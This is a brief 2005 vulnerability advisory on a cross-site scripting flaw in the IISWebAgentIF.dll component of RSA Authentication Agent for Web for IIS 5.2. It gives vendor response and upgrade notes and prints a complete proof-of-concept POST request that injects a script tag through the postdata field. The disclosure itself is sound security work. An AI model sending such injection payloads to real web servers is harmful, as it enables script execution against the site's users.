RSA Authentication Agent for Web - IISWebAgentIF.dll - Cross Site Scripting Vulnerability
=========================================================================================


Product/Version:
============

RSA Authentication Agent for Web for IIS 5.2

Vulnerability:
=========

Cross Site Scripting vulnerability in IISWebAgentIF.dll

Exploitation:
=========

Send the following request to the webserver:

POST /WebID/IISWebAgentIF.dll HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Cache-Control: no-cache
Referer: https://www.example.com/
Content-Length: 135

stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6

Discovered:
========

By: oliver karow
At: 09. April 2005
http://www.oliverkarow.de/research/rsaxss.txt

Vendor:
======

Vendor responded within one day and was very cooperative!

Homepage: http://www.rsasecurity.com/

Solution:
======

Upgrade to RSA Authentication Agent for Web for IIS 5.3